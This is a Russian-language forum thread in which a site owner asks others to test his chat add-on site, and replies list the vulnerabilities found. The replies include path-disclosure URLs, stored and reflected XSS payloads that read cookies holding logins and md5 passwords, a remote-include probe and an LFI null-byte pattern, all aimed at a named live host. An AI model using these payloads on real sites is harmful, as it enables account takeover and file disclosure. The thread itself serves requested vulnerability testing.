Форум АНТИЧАТ - http://addons.august4u.eu

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - http://addons.august4u.eu (https://forum.antichat.xyz/showthread.php?t=127930)

http://addons.august4u.eu

Все привет, вот открыл сервис дополнений к август4у чатам, и надо проверить сайт на уязвимости, прошу протестить сайт пожалста!!!!

раскрытие путей:

http://addons.august4u.eu/top/top.php?id=11

Цитата:

Warning: imagecreatefromjpeg(img/logo.jpg) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /var/www/[скрыто]/top/top.php on line 35

http://addons.august4u.eu/come.php?comanda=delfriend&idfriend=999999999999

Цитата:

Warning: fopen(datamsg/id999999999999/friend.dat) [function.fopen]: failed to open stream: No such file or directory in /var/www/[скрыто]/come.php on line 492

http://addons.august4u.eu/come.php?comanda=addfriend&idfriend=999999999999

Цитата:

Warning: fopen(datamsg/id999999999999/black.dat) [function.fopen]: failed to open stream: No such file or directory in /var/www/[скрыто]/come.php on line 424

тут сохраняются файлкеки правда пустые....
http://addons.august4u.eu/datamsg/id1/friend.dat
http://addons.august4u.eu/datamsg/id1/black.dat

теперь XSS (обязательно залогинеца нада):

делаем такой запрос:
http://addons.august4u.eu/come.php?comanda=addfriend&idfriend=999999"><scrip t>alert(document.cookie)</script>999999

и тут смотрим результат:
http://addons.august4u.eu/index.php?comanda=friends

в куках логин и пасс(md5)...

XSS и раскрытие путей тех же.

Цитата:

http://addons.august4u.eu/index.php?comanda=viemfoto&files=1>"><ScRiPt%20%0a
%0d>alert(12345)%3B</ScRiPt>

По идее инклюд, но не крутил на предмет реального выполнения.

Цитата:

http://addons.august4u.eu/index.php?comanda=viemfoto&files=http://www.admin.com

LFI
http://addons.august4u.eu/index.php?comanda=viemfoto&files=../{FILE}%00

сайт в дирах. где не подставлю ковычку - ошибка.

всем за участие спс, буду переписывать фильтр, и делать более строгую проверку данных))